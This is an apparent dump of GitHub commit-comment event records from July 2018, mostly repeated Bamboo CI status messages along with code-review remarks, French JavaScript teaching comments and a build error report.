{"id":"7967758489","type":"CommitCommentEvent","actor":{"login":"rkhemka"},"repo":{"name":"rkhemka/CS-3220-Introduction-to-Web-Development-"},"payload":{"comment":{"id":29713851,"position":null,"line":null,"path":null,"commit_id":"b59aee20dedf3970758111b8356a487f54d5c1ff","created_at":"2018-07-15T18:33:45Z","updated_at":"2018-07-15T18:33:45Z","author_association":"OWNER","body":"Readme"}},"created_at":"2018-07-15T18:33:45Z"}
{"id":"7967758614","type":"CommitCommentEvent","actor":{"login":"Bonnie-B"},"repo":{"name":"Bonnie-B/Bonnie-B.github.io"},"payload":{"comment":{"id":29713852,"position":5,"line":4,"path":"_data/navigation.yml","commit_id":"5cfc05257611654a5be42d1334fb549032c5170c","created_at":"2018-07-15T18:33:52Z","updated_at":"2018-07-15T18:33:52Z","author_association":"OWNER","body":"This broke the link"}},"created_at":"2018-07-15T18:33:52Z"}
{"id":"7967758709","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713853,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-15T18:33:58Z","updated_at":"2018-07-15T18:33:58Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:33:58Z"}
{"id":"7967758730","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713854,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-15T18:33:59Z","updated_at":"2018-07-15T18:33:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:33:59Z"}
{"id":"7967759174","type":"CommitCommentEvent","actor":{"login":"zeule"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29713855,"position":null,"line":null,"path":null,"commit_id":"0ad52903890fe680307b46f4051bdd91d8aaffd5","created_at":"2018-07-15T18:34:20Z","updated_at":"2018-07-15T18:34:20Z","author_association":"CONTRIBUTOR","body":"What qBt version you are talking about? The -9999.ebuild is outdated, 4.1.1 correctly passes `-DSYSTEM_QTSINGLEAPPLICATION=ON`. "}},"created_at":"2018-07-15T18:34:20Z"}
{"id":"7967759532","type":"CommitCommentEvent","actor":{"login":"chikamichi"},"repo":{"name":"khammileon/s02e01-challenge1"},"payload":{"comment":{"id":29713857,"position":97,"line":97,"path":"js/app.js","commit_id":"f0c291528c060eee806b4f365bf06e1dee80605d","created_at":"2018-07-15T18:34:36Z","updated_at":"2018-07-15T18:34:36Z","author_association":"NONE","body":"Attention, l'opérateur booléen `||`, le OU logique, n'est peut-être pas ce que tu veux ici.\r\n\r\nTu cherches à déterminer si le client a assez d'argent ET si le théâtre est complet. C'est seulement si ces deux conditions sont vraies que tu vas dire « Je m'excuse, nous sommes complet […] »"}},"created_at":"2018-07-15T18:34:36Z"}
{"id":"7967759748","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713858,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-15T18:34:46Z","updated_at":"2018-07-15T18:34:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:34:46Z"}
{"id":"7967759778","type":"CommitCommentEvent","actor":{"login":"chikamichi"},"repo":{"name":"khammileon/s02e01-challenge1"},"payload":{"comment":{"id":29713859,"position":97,"line":97,"path":"js/app.js","commit_id":"f0c291528c060eee806b4f365bf06e1dee80605d","created_at":"2018-07-15T18:34:48Z","updated_at":"2018-07-15T18:34:48Z","author_association":"NONE","body":"https://developer.mozilla.org/fr/docs/Web/JavaScript/Reference/Op%C3%A9rateurs/Op%C3%A9rateurs_logiques"}},"created_at":"2018-07-15T18:34:48Z"}
{"id":"7967760160","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713860,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-15T18:35:07Z","updated_at":"2018-07-15T18:35:07Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:35:07Z"}
{"id":"7967760292","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713861,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-15T18:35:11Z","updated_at":"2018-07-15T18:35:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:35:11Z"}
{"id":"7967761306","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713862,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-15T18:36:01Z","updated_at":"2018-07-15T18:36:01Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:36:01Z"}
{"id":"7967761407","type":"CommitCommentEvent","actor":{"login":"MPX4132"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29713863,"position":null,"line":null,"path":null,"commit_id":"f92c61edc745646340b00dc63995a371b8d302e2","created_at":"2018-07-15T18:36:06Z","updated_at":"2018-07-15T18:36:06Z","author_association":"MEMBER","body":"It's all good, it does look a bit confusing. Maybe I should've just moved the braces to the inner variable, but I didn't think of that when I made the change yesterday."}},"created_at":"2018-07-15T18:36:06Z"}
{"id":"7967761636","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713864,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-15T18:36:15Z","updated_at":"2018-07-15T18:36:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:36:15Z"}
{"id":"7967761815","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713866,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-15T18:36:24Z","updated_at":"2018-07-15T18:36:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:36:24Z"}
{"id":"7967762627","type":"CommitCommentEvent","actor":{"login":"rkubosz"},"repo":{"name":"swaywm/sway"},"payload":{"comment":{"id":29713867,"position":null,"line":null,"path":null,"commit_id":"d88f1d2196702ba35f47d6b2ce5de2d1f1d9f15a","created_at":"2018-07-15T18:37:04Z","updated_at":"2018-07-15T18:37:04Z","author_association":"CONTRIBUTOR","body":"Hi, this commit is causing a build error:\r\n```\r\n../sway/desktop/output.c: In function ‘output_has_opaque_lockscreen’:\r\n../sway/desktop/output.c:207:57: error: ‘struct wlr_surface’ has no member named ‘opaque_region’\r\n   pixman_region32_copy(&surface_opaque_box, &wlr_surface->opaque_region);\r\n                                                         ^~\r\n[7/151] Compiling C object 'sway/sway@@sway@exe/config_bar.c.o'.\r\nninja: build stopped: subcommand failed.\r\n```"}},"created_at":"2018-07-15T18:37:04Z"}
{"id":"7967762856","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713868,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-15T18:37:16Z","updated_at":"2018-07-15T18:37:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:37:16Z"}
{"id":"7967762987","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713869,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-15T18:37:23Z","updated_at":"2018-07-15T18:37:23Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:37:23Z"}
{"id":"7967763183","type":"CommitCommentEvent","actor":{"login":"AnonGuy"},"repo":{"name":"AnonGuy/GroupMeDiscord"},"payload":{"comment":{"id":29713873,"position":null,"line":null,"path":null,"commit_id":"d3c21f38ddd6df3b8c06c2e6b3cd2d818761d227","created_at":"2018-07-15T18:37:33Z","updated_at":"2018-07-15T18:37:33Z","author_association":"OWNER","body":"The second commit message, and it's spelt incorrectly rip"}},"created_at":"2018-07-15T18:37:33Z"}
{"id":"7967763218","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713874,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-15T18:37:35Z","updated_at":"2018-07-15T18:37:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:37:35Z"}
{"id":"7967763531","type":"CommitCommentEvent","actor":{"login":"CAPCHIK"},"repo":{"name":"ITLabRTUMIREA/ITLab-Back"},"payload":{"comment":{"id":29713876,"position":null,"line":null,"path":null,"commit_id":"c0fab73c2fa301d91aea723e735910f38ae8f8de","created_at":"2018-07-15T18:37:50Z","updated_at":"2018-07-15T18:37:50Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Смены и места](https://trello.com/c/lDDCvb7q/56-%D1%81%D0%BC%D0%B5%D0%BD%D1%8B-%D0%B8-%D0%BC%D0%B5%D1%81%D1%82%D0%B0)"}},"created_at":"2018-07-15T18:37:50Z"}
{"id":"7967763693","type":"CommitCommentEvent","actor":{"login":"chikamichi"},"repo":{"name":"khammileon/s02e01-challenge1"},"payload":{"comment":{"id":29713877,"position":6,"line":40,"path":"js/app.js","commit_id":"4de150aa3768f3aaa1ad9ceb66674d2cddc23935","created_at":"2018-07-15T18:37:58Z","updated_at":"2018-07-15T18:37:58Z","author_association":"NONE","body":"Attention, tu n'es censée *définir* une variable qu'une seule fois, après tu peux réassigner sa valeur autant de fois que tu le souhaites :\r\n\r\n``` js\r\nvar argent; // définition de la variable => désormais, elle existe ! (mais sa valeur est undefined, indéfinie)\r\nargent = 'salut :D';\r\nargent = 'ça va ? bon…';\r\nargent = window.prompt(\"Combien d'argent avez-vous ?\");\r\n// À partir de cette ligne de code et pour toutes les suivantes,\r\n// à moins que la valeur de argent ne soit encore une fois réassignée,\r\n// elle vaudra ce que l'utilisateur a entré dans le prompt.\r\n```"}},"created_at":"2018-07-15T18:37:58Z"}
{"id":"7967763872","type":"CommitCommentEvent","actor":{"login":"emersion"},"repo":{"name":"swaywm/sway"},"payload":{"comment":{"id":29713878,"position":null,"line":null,"path":null,"commit_id":"d88f1d2196702ba35f47d6b2ce5de2d1f1d9f15a","created_at":"2018-07-15T18:38:07Z","updated_at":"2018-07-15T18:38:07Z","author_association":"MEMBER","body":"Update your wlroots repo"}},"created_at":"2018-07-15T18:38:07Z"}
{"id":"7967764268","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713880,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-15T18:38:25Z","updated_at":"2018-07-15T18:38:25Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-15T18:38:25Z"}
{"id":"7967764371","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713881,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-15T18:38:31Z","updated_at":"2018-07-15T18:38:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:38:31Z"}
{"id":"7967764394","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713882,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-15T18:38:32Z","updated_at":"2018-07-15T18:38:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:38:32Z"}
{"id":"7967764614","type":"CommitCommentEvent","actor":{"login":"chikamichi"},"repo":{"name":"khammileon/s02e01-challenge1"},"payload":{"comment":{"id":29713884,"position":6,"line":40,"path":"js/app.js","commit_id":"4de150aa3768f3aaa1ad9ceb66674d2cddc23935","created_at":"2018-07-15T18:38:43Z","updated_at":"2018-07-15T18:38:43Z","author_association":"NONE","body":"La première instruction est donc du type *déclaration (définition) de variable*, les trois suivantes du type *réassignation de variable*."}},"created_at":"2018-07-15T18:38:43Z"}
{"id":"7967764710","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713887,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-15T18:38:49Z","updated_at":"2018-07-15T18:38:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:38:49Z"}
{"id":"7967764765","type":"CommitCommentEvent","actor":{"login":"SSHrmrf"},"repo":{"name":"SSHrmrf/wallpapers"},"payload":{"comment":{"id":29713888,"position":null,"line":null,"path":null,"commit_id":"8a926a433f2eef3613b9feab13a5f5fd218c5c7e","created_at":"2018-07-15T18:38:52Z","updated_at":"2018-07-15T18:38:52Z","author_association":"OWNER","body":"![serpent vert](https://user-images.githubusercontent.com/34134953/42736927-7abd9cc2-886e-11e8-94a5-a1917fb54649.jpg)\r\n![black coffee](https://user-images.githubusercontent.com/34134953/42736930-86b5d2b0-886e-11e8-955a-24f82fc5418f.png)\r\n![planettes](https://user-images.githubusercontent.com/34134953/42736945-b1df1c26-886e-11e8-9623-9a06547ee09b.jpg)\r\n![code-terminal](https://user-images.githubusercontent.com/34134953/42736949-c0cc1130-886e-11e8-8b3a-79123419ff14.jpg)\r\n![never forget](https://user-images.githubusercontent.com/34134953/42736953-d030d2a0-886e-11e8-8c4d-5d1b03fa6624.jpg)\r\n![gnu-linux](https://user-images.githubusercontent.com/34134953/42736955-d78e7142-886e-11e8-9fc5-e70612c663ed.png)\r\n![scooby doo zombie](https://user-images.githubusercontent.com/34134953/42736961-e0f476be-886e-11e8-815a-6516c465249a.jpg)\r\n![mecanic girl](https://user-images.githubusercontent.com/34134953/42736975-0c791844-886f-11e8-8fba-0a437f41f752.jpg)\r\n"}},"created_at":"2018-07-15T18:38:52Z"}
{"id":"7967764787","type":"CommitCommentEvent","actor":{"login":"chikamichi"},"repo":{"name":"khammileon/s02e01-challenge1"},"payload":{"comment":{"id":29713889,"position":14,"line":47,"path":"js/app.js","commit_id":"4de150aa3768f3aaa1ad9ceb66674d2cddc23935","created_at":"2018-07-15T18:38:53Z","updated_at":"2018-07-15T18:38:53Z","author_association":"NONE","body":"Aaaaah :+1: "}},"created_at":"2018-07-15T18:38:53Z"}
{"id":"7967765059","type":"CommitCommentEvent","actor":{"login":"chikamichi"},"repo":{"name":"khammileon/s02e01-challenge1"},"payload":{"comment":{"id":29713890,"position":25,"line":56,"path":"js/app.js","commit_id":"4de150aa3768f3aaa1ad9ceb66674d2cddc23935","created_at":"2018-07-15T18:39:05Z","updated_at":"2018-07-15T18:39:05Z","author_association":"NONE","body":"Pareil ici évidemment ^^"}},"created_at":"2018-07-15T18:39:05Z"}
{"id":"7967765622","type":"CommitCommentEvent","actor":{"login":"SSHrmrf"},"repo":{"name":"SSHrmrf/wallpapers"},"payload":{"comment":{"id":29713891,"position":null,"line":null,"path":null,"commit_id":"8a926a433f2eef3613b9feab13a5f5fd218c5c7e","created_at":"2018-07-15T18:39:34Z","updated_at":"2018-07-15T18:39:34Z","author_association":"OWNER","body":"quelques fond d'écrans choisie "}},"created_at":"2018-07-15T18:39:34Z"}
{"id":"7967765709","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713892,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-15T18:39:38Z","updated_at":"2018-07-15T18:39:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:39:38Z"}
{"id":"7967765810","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713893,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-15T18:39:44Z","updated_at":"2018-07-15T18:39:44Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:39:44Z"}
